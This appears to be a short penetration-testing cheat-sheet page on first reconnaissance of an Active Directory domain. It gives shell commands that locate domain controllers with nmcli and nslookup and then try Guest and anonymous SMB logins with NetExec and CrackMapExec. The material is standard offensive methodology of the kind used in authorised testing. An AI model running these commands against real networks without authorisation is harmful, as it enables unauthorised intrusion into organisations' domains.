Active Directory First Lookup
Table of contents
Prerequisites
- Network route to at least one domain controller.
Exploit
First, let’s identify domain controllers of the Active Directory domain you are targeting.
# Get domain name.
nmcli dev show $Interface | grep -i "domain"
# Get domain controllers IPs.
nslookup $DomainName
Now, using NetExec, try to authenticate as anonymous and Guest.
# Get domain controllers system info.
nxc smb $DomainControllersIPs
# Authenticate as Guest and anonymous.
cme smb $DomainControllerIP -d $DomainName -u 'Guest' -p ''
cme smb $DomainControllerIP -d $DomainName -u 'Guest' -p '' --local-auth
cme smb $DomainControllerIP -d $DomainName -u '' -p ''
cme smb $DomainControllerIP -d $DomainName -u '' -p '' --local-auth